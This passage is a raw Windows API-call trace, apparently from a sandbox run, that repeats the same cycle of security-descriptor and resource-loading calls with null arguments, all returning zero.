0 [0070.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.086] LockResource (hResData=0x0) returned 0x0 [0070.086] FreeResource (hResData=0x0) returned 0 [0070.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.087] LockResource (hResData=0x0) returned 0x0 [0070.087] FreeResource (hResData=0x0) returned 0 [0070.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.088] LockResource (hResData=0x0) returned 0x0 [0070.088] FreeResource (hResData=0x0) returned 0 [0070.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.089] LockResource (hResData=0x0) returned 0x0 [0070.089] FreeResource (hResData=0x0) returned 0 [0070.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.089] LockResource (hResData=0x0) returned 0x0 [0070.089] FreeResource (hResData=0x0) returned 0 [0070.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.089] LockResource (hResData=0x0) returned 0x0 [0070.089] FreeResource (hResData=0x0) returned 0 [0070.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.089] LockResource (hResData=0x0) returned 0x0 [0070.089] FreeResource (hResData=0x0) returned 0 [0070.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.089] LockResource (hResData=0x0) returned 0x0 [0070.089] FreeResource (hResData=0x0) returned 0 [0070.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.090] FreeResource (hResData=0x0) returned 0 [0070.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.090] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.091] LockResource (hResData=0x0) returned 0x0 [0070.091] FreeResource (hResData=0x0) returned 0 [0070.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, 